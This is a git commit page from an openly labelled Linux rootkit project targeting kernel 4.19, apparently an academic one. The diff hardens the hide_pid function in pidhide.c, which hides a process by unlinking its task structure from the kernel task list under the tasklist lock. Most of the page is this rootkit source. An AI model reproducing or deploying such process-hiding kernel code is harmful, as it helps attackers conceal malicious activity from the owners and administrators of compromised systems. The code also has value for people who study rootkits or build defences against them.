attempt 3 - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 9b9b7120a05597ec6242075ef3e394f08e963766
parent 26354795f185a55c46ff0f88a55659066e0c26e8
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 25 Jan 2021 03:41:52 +0100

attempt 3

Diffstat:
M rootkit/src/pidhide.c  | 6 +++++-

1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -88,13 +88,17 @@ hide_pid(pid_t pid)
 
     rwlock_t *rwlock = (rwlock_t *)kallsyms_lookup_name("tasklist_lock");
 
-    if (!ts)
+    if (!ts || !ts->tasks.prev || !ts->tasks.next) {
+        DEBUG_INFO("NULL SOMEWHERE\n");
         return;
+    }
 
+    rcu_read_lock();
     write_lock_irq(rwlock);
 	ts->tasks.prev->next = ts->tasks.next;
 	ts->tasks.next->prev = ts->tasks.prev;
     write_unlock_irq(rwlock);
+    rcu_read_unlock();
 }
 
 void

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs